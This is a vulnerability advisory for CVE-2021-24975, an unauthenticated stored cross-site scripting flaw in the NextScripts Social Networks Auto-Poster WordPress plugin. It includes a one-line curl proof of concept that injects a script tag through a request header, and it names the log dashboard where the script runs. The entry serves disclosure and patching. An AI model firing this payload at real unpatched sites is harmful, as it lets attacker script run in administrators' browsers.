NextScripts: Social Networks Auto-Poster < 4.3.24 – Unauthenticated Stored XSS | CVE 2021-24975 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape logged requests before outputting them in the related admin dashboard, leading to an Unauthenticated Stored Cross-Site Scripting issue

Proof of Concept

curl -H 'x-tomato: <script>alert(/XSS/);</script>' 'https://example.com/?nxs-cronrun=yes'

The XSS will be triggered in the Log/History dashboard (/wp-admin/admin.php?page=nxs-log)

Affects Plugins

social-networks-auto-poster-facebook-twitter-g

Fixed in 4.3.24

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2650138

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

b99dae3d-8230-4427-adc5-4ef9cbfb8ba1

Timeline

Publicly Published

2022-01-03 (about 4 years ago)

Added

2022-01-03 (about 4 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2025-10-02

Title

Fintelligence Calculator <= 1.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-03-31

Title

Timeline Event History <= 3.2 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2022-02-17

Title

Kunze Law < 2.1 - Admin+ Stored Cross-Site Scripting

Published

2024-08-29

Title

HubSpot – CRM, Email Marketing, Live Chat, Forms & Analytics < 11.1.34 - Authenticated (Contributor+) Stored Cross-Site Scripting via HubSpot Meeting Widget

Published

2025-05-10

Title

Premmerce Product Search for WooCommerce <= 2.2.4 - Authenticated (Administrator+) Stored Cross-Site Scripting